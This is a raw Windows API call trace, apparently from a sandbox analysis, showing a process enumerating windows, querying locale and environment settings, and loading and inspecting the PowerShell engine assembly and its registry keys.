	[0586.866] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x59c
	[0586.866] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xa88
	[0586.866] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xa6c
	[0586.866] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xa68
	[0586.866] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x9f8
	[0586.866] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xa04
	[0586.866] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x924
	[0586.866] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x8dc
	[0586.867] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x7dc
	[0586.867] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x768
	[0586.867] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x764
	[0586.867] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x820
	[0586.867] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x810
	[0586.867] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x794
	[0586.867] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x83c
	[0586.867] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x7ac
	[0586.868] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xb44
	[0586.868] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xb5c
	[0586.868] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x838
	[0586.868] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.868] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.868] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.868] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.868] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.868] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.869] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.869] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.869] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x818
	[0586.869] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x5b8
	[0586.869] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x494
	[0586.869] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1ec
	[0586.869] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x440
	[0586.869] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x7e8
	[0586.870] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x730
	[0586.870] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x2c8
	[0586.870] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x31c
	[0586.870] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x330
	[0586.870] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x128
	[0586.870] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x5c8
	[0586.870] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x6f8
	[0586.870] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x358
	[0586.870] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x73c
	[0586.871] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0xb0
	[0586.871] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x250
	[0586.871] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x240
	[0586.871] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x790
	[0586.871] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x61c
	[0586.871] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x540
	[0586.871] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x538
	[0586.871] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x568
	[0586.872] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x538
	[0586.872] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x568
	[0586.872] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x538
	[0586.872] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x540
	[0586.872] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x540
	[0586.872] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x57c
	[0586.872] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x460
	[0586.872] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x554
	[0586.873] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.873] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x528
	[0586.873] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.873] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.873] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.873] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x79c
	[0586.873] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.873] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4e0
	[0586.873] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.874] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x460
	[0586.874] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x460
	[0586.874] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x44c
	[0586.874] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x778
	[0586.874] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x460
	[0586.874] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x558
	[0586.874] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.874] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x4d0
	[0586.875] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1bb4
	[0586.875] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x10bc
	[0586.875] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1b50
	[0586.875] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x14b4
	[0586.875] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x149c
	[0586.875] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x14a8
	[0586.875] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1490
	[0586.875] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x14a4
	[0586.876] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x148c
	[0586.876] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1458
	[0586.876] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1b4c
	[0586.876] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1b3c
	[0586.876] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x19bc
	[0586.876] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x199c
	[0586.876] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1998
	[0586.876] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1994
	[0586.877] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1990
	[0586.877] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x1984
	[0586.877] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x26d880 | out: lpdwProcessId=0x26d880) returned 0x197c
	[0586.884] WerSetFlags () returned 0x0
	[0588.471] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0588.471] CoTaskMemFree (pv=0x0) 
	[0588.472] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26dbe8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26dbe0 | out: pulNumLanguages=0x26dbe8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26dbe0) returned 1
	[0588.472] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26dbe8, pwszLanguagesBuffer=0x2d83120, pcchLanguagesBuffer=0x26dbe0 | out: pulNumLanguages=0x26dbe8, pwszLanguagesBuffer=0x2d83120, pcchLanguagesBuffer=0x26dbe0) returned 1
	[0588.478] CoTaskMemAlloc (cb=0x24) returned 0x14b310
	[0588.478] GetUserDefaultLocaleName (in: lpLocaleName=0x14b310, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0588.478] CoTaskMemFree (pv=0x14b310) 
	[0588.503] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0588.503] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0588.503] CoTaskMemFree (pv=0x139a40) 
	[0588.505] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0588.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0588.505] CoTaskMemFree (pv=0x139a40) 
	[0588.507] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0588.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0588.507] CoTaskMemFree (pv=0x139a40) 
	[0590.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.355] SetErrorMode (uMode=0x1) returned 0x1
	[0590.355] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26d860 | out: lpFileInformation=0x26d860*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0590.355] SetErrorMode (uMode=0x1) returned 0x1
	[0590.355] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26dad0 | out: lpdwHandle=0x26dad0) returned 0x94c
	[0590.356] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d869b0 | out: lpData=0x2d869b0) returned 1
	[0590.357] VerQueryValueW (in: pBlock=0x2d869b0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26da48, puLen=0x26da40 | out: lplpBuffer=0x26da48*=0x2d86a4c, puLen=0x26da40) returned 1
	[0590.357] VerQueryValueW (in: pBlock=0x2d869b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26d9b8, puLen=0x26d9b0 | out: lplpBuffer=0x26d9b8*=0x2d86b28, puLen=0x26d9b0) returned 1
	[0590.358] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0590.358] CoTaskMemAlloc (cb=0x2e) returned 0x11d2a0
	[0590.358] lstrcpyW (in: lpString1=0x11d2a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0590.358] CoTaskMemFree (pv=0x11d2a0) 
	[0590.358] VerQueryValueW (in: pBlock=0x2d869b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26d9b8, puLen=0x26d9b0 | out: lplpBuffer=0x26d9b8*=0x2d86b7c, puLen=0x26d9b0) returned 1
	[0590.358] lstrlenW (lpString="System.Management.Automation") returned 28
	[0590.358] CoTaskMemAlloc (cb=0x3c) returned 0x1533a0
	[0590.358] lstrcpyW (in: lpString1=0x1533a0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0590.358] CoTaskMemFree (pv=0x1533a0) 
	[0590.358] VerQueryValueW (in: pBlock=0x2d869b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26d9b8, puLen=0x26d9b0 | out: lplpBuffer=0x26d9b8*=0x2d86bd8, puLen=0x26d9b0) returned 1
	[0590.358] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0590.358] CoTaskMemAlloc (cb=0x20) returned 0x1501a0
	[0590.358] lstrcpyW (in: lpString1=0x1501a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0590.358] CoTaskMemFree (pv=0x1501a0) 
	[0590.358] VerQueryValueW (in: pBlock=0x2d869b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26d9b8, puLen=0x26d9b0 | out: lplpBuffer=0x26d9b8*=0x2d86c18, puLen=0x26d9b0) returned 1
	[0590.358] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0590.358] CoTaskMemAlloc (cb=0x44) returned 0x1533a0
	[0590.358] lstrcpyW (in: lpString1=0x1533a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0590.359] CoTaskMemFree (pv=0x1533a0) 
	[0590.359] VerQueryValueW (in: pBlock=0x2d869b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26d9b8, puLen=0x26d9b0 | out: lplpBuffer=0x26d9b8*=0x2d86c80, puLen=0x26d9b0) returned 1
	[0590.359] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0590.359] CoTaskMemAlloc (cb=0x76) returned 0xeda30
	[0590.359] lstrcpyW (in: lpString1=0xeda30, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0590.359] CoTaskMemFree (pv=0xeda30) 
	[0590.359] VerQueryValueW (in: pBlock=0x2d869b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26d9b8, puLen=0x26d9b0 | out: lplpBuffer=0x26d9b8*=0x2d86d1c, puLen=0x26d9b0) returned 1
	[0590.359] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0590.359] CoTaskMemAlloc (cb=0x44) returned 0x1533a0
	[0590.359] lstrcpyW (in: lpString1=0x1533a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0590.359] CoTaskMemFree (pv=0x1533a0) 
	[0590.359] VerQueryValueW (in: pBlock=0x2d869b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26d9b8, puLen=0x26d9b0 | out: lplpBuffer=0x26d9b8*=0x2d86d80, puLen=0x26d9b0) returned 1
	[0590.359] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0590.359] CoTaskMemAlloc (cb=0x58) returned 0xa5390
	[0590.359] lstrcpyW (in: lpString1=0xa5390, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0590.359] CoTaskMemFree (pv=0xa5390) 
	[0590.360] VerQueryValueW (in: pBlock=0x2d869b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26d9b8, puLen=0x26d9b0 | out: lplpBuffer=0x26d9b8*=0x2d86dfc, puLen=0x26d9b0) returned 1
	[0590.360] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0590.360] CoTaskMemAlloc (cb=0x20) returned 0x1501a0
	[0590.360] lstrcpyW (in: lpString1=0x1501a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0590.360] CoTaskMemFree (pv=0x1501a0) 
	[0590.360] VerQueryValueW (in: pBlock=0x2d869b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26d9b8, puLen=0x26d9b0 | out: lplpBuffer=0x26d9b8*=0x2d86aa4, puLen=0x26d9b0) returned 1
	[0590.360] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0590.360] CoTaskMemAlloc (cb=0x66) returned 0x1454f0
	[0590.360] lstrcpyW (in: lpString1=0x1454f0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0590.360] CoTaskMemFree (pv=0x1454f0) 
	[0590.360] VerQueryValueW (in: pBlock=0x2d869b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26d9b8, puLen=0x26d9b0 | out: lplpBuffer=0x26d9b8*=0x0, puLen=0x26d9b0) returned 0
	[0590.360] VerQueryValueW (in: pBlock=0x2d869b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26d9b8, puLen=0x26d9b0 | out: lplpBuffer=0x26d9b8*=0x0, puLen=0x26d9b0) returned 0
	[0590.360] VerQueryValueW (in: pBlock=0x2d869b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26d9b8, puLen=0x26d9b0 | out: lplpBuffer=0x26d9b8*=0x0, puLen=0x26d9b0) returned 0
	[0590.360] VerQueryValueW (in: pBlock=0x2d869b0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26d988, puLen=0x26d980 | out: lplpBuffer=0x26d988*=0x2d86a4c, puLen=0x26d980) returned 1
	[0590.360] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0590.360] VerLanguageNameW (in: wLang=0x0, szLang=0xf4470, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0590.360] CoTaskMemFree (pv=0xf4470) 
	[0590.360] VerQueryValueW (in: pBlock=0x2d869b0, lpSubBlock="\\", lplpBuffer=0x26d9d8, puLen=0x26d9d0 | out: lplpBuffer=0x26d9d8*=0x2d869d8, puLen=0x26d9d0) returned 1
	[0590.369] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0590.369] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0590.369] CoTaskMemFree (pv=0x139a40) 
	[0590.374] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0590.374] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0590.374] CoTaskMemFree (pv=0x139a40) 
	[0590.383] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d8a8 | out: phkResult=0x26d8a8*=0x308) returned 0x0
	[0590.384] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d898 | out: phkResult=0x26d898*=0x30c) returned 0x0
	[0590.384] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d928 | out: phkResult=0x26d928*=0x310) returned 0x0
	[0591.729] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d86c, lpData=0x0, lpcbData=0x26d868*=0x0 | out: lpType=0x26d86c*=0x1, lpData=0x0, lpcbData=0x26d868*=0x56) returned 0x0
	[0591.730] CoTaskMemAlloc (cb=0x5a) returned 0x145480
	[0591.730] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d83c, lpData=0x145480, lpcbData=0x26d838*=0x56 | out: lpType=0x26d83c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d838*=0x56) returned 0x0
	[0591.730] CoTaskMemFree (pv=0x145480) 
	[0591.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0591.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0591.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0592.854] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0592.854] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.854] CoTaskMemFree (pv=0x139a40) 
